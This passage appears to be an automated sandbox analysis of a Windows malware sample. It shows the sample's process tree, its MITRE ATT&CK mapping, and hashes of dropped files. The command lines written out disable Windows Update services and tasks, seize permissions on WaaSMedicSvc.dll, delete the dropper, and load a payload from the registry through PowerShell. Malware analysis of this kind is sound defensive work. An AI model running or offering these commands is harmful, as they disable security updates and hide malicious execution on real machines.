HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        8⤵
        
        PID:1456
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        9⤵
        Launches sc.exe
        
        PID:2200
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        9⤵
        Launches sc.exe
        
        PID:2272
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        9⤵
        Launches sc.exe
        
        PID:2460
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        9⤵
        Launches sc.exe
        
        PID:1884
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        9⤵
        Launches sc.exe
        
        PID:408
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        9⤵
        Launches sc.exe
        
        PID:2332
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1928
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        9⤵
        Launches sc.exe
        
        PID:324
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1684
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        9⤵
        Launches sc.exe
        
        PID:2448
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:1672
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        9⤵
        Launches sc.exe
        
        PID:868
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2084
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        9⤵
        Launches sc.exe
        
        PID:2472
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        9⤵
        Launches sc.exe
        
        PID:2476
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1380
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1580
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        9⤵
        
        PID:2268
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        9⤵
        
        PID:2808
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        9⤵
        
        PID:2236
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        9⤵
        
        PID:2520
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        9⤵
        
        PID:3008
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        9⤵
        
        PID:2220
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        9⤵
        
        PID:2800
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        9⤵
        
        PID:2160
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        9⤵
        
        PID:912
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        9⤵
        
        PID:2516
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        9⤵
        
        PID:2608
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        9⤵
        
        PID:2972
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        9⤵
        
        PID:2912
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:1760
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2416
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2492
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        8⤵
        
        PID:2232
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "sjrcqeodaodte"
        9⤵
        
        PID:2864
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        
        PID:1224
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:1524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Users\Admin\AppData\Local\Temp\explorer.exe
    C:\Users\Admin\AppData\Local\Temp\explorer.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Users\Admin\AppData\Local\Temp\windowshost.exe
    C:\Users\Admin\AppData\Local\Temp\windowshost.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2688
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2200
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2380
      - C:\driverPerf\cominto.exe
        
        "C:\driverPerf\cominto.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1276

C:\Windows\system32\taskeng.exe
taskeng.exe {CC22A47E-939E-4EDD-B1E3-0BD47F9A66B3} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1276
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\explorer.exe

Filesize
95KB

MD5
19eab19c0d0a0b062c8eb85a94a79cc6

SHA1
3f0e2e88b9ff61e2e56edc473861cc4373af525a

SHA256
02eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215

SHA512
550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
2.1MB

MD5
fa0429acc4b9cfd414d24fae0e299790

SHA1
80d76038b5401080e18e6b015cbf806d9abe8589

SHA256
1440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489

SHA512
f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowshost.exe

Filesize
2.8MB

MD5
51ab765a1b1f884f936db4ffc642d728

SHA1
7b7741bf5dfeaed3860bf308733490017688fa46

SHA256
816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14

SHA512
e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d3a0955c47a3fcabd8f137c96d581265

SHA1
c9af30bd8a694e75149166980c60df703deeac8a

SHA256
e3abd64ad50be9f537531dd992efdb9159edfa607bfe9dce059b960ade238a7d

SHA512
34cdfc415f192bc283f87baf4104297dc5da5e254e7f420fe162c3880ba0ebeb8b8f418d89a6f5936eb2f9c88e2676cf03c1efce49f2986cf4e65fccf6c0e10f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
919e940093334a5ddbf62d248c870406

SHA1
e2cb1f4464fe0d97ea82b7b4795afd82e675bed5

SHA256
52968a70ee6265bb06ed5654316a9bbcd0d2245de9f69b4f4d9410bc9e78b198

SHA512
edf0f4d4046b19afe61c67824981a142a01312f8ffd7279e3f2ef88c908a385ddc7b5a4f913525d3f36c14646e81d4520f87cb4394539372993d2a75ac7834b8

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
478B

MD5
f80133f903847e97e742d5e5025e675e

SHA1
20710f0785b24417a6b3b3a7d91412ef1efda909

SHA256
993e9509a862a1e6b4b5ac75938f3092be9fb4d8862769b66007ec28dd461065

SHA512
344d18f8e4bdfef6ac5054305f4f2b2901ca5f0560d3cc64628b8df9b023e96fcfd45e843e2e548e580c3c5d63ff5c74079cc0ee93011ac205160fff30f70135

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
25e23e93f073fd8006c31578c6541ace

SHA1
4eb06835f9e4fb2c2eeda279d9bbdb777542c0e1

SHA256
814d01a00d408bd0fbe158e9d1ab87b5a175ce5bcbcd17fb91d2d9e7fd836fee

SHA512
1bd6cd3064d43bab429ad2d51ade125217bf24786c79492afb7c707bdda521f4dab4a0cec2678eb411e3ae86309011a576a59767ad64129523b42cd54b558b69

Download Submit
C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe

Filesize
212B

MD5
76764afd7b394cd6a9c36fa16d4c88fc

SHA1
5274a18139edf134230252c97652bfa6319b1a78

SHA256
e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e

SHA512
3018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae

Download Submit
C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat

Filesize
27B

MD5
61b88edb5f6dca914ee05650653d8223

SHA1
4b61f3f21e8c981aaa73e375d090de82be46720d

SHA256
eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12

SHA512
1eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\driverPerf\cominto.exe

Filesize
2.5MB

MD5
4344aa160852993fab07ae5793321886

SHA1
d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5

SHA256
bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4

SHA512
557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0

Download Submit
memory/316-169-0x00000000001E0000-0x00000000001E6000-memory.dmp

Filesize
24KB

Download
memory/1016-95-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

Filesize
4KB

Download
memory/1276-42-0x0000000000260000-0x00000000004EE000-memory.dmp

Filesize
2.6MB

Download
memory/1276-43-0x0000000000240000-0x000000000024E000-memory.dmp

Filesize
56KB

Download
memory/1808-147-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1808-151-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1808-150-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1808-139-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1808-141-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1808-143-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1808-145-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2020-137-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2020-136-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/2164-31-0x00000000009E0000-0x00000000009FE000-memory.dmp

Filesize
120KB

Download
memory/2188-58-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2188-57-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

Filesize
2.9MB

Download
memory/2268-44-0x00000000001F0000-0x0000000000411000-memory.dmp

Filesize
2.1MB

Download
memory/2268-60-0x0000000000450000-0x0000000000456000-memory.dmp

Filesize
24KB

Download
memory/2268-46-0x000000001B780000-0x000000001B9A2000-memory.dmp

Filesize
2.1MB

Download
memory/2504-67-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-75-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-73-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-70-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-65-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-63-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-87-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-71-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-97-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-61-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2504-86-0x000007FFFFFD3000-0x000007FFFFFD4000-memory.dmp

Filesize
4KB

Download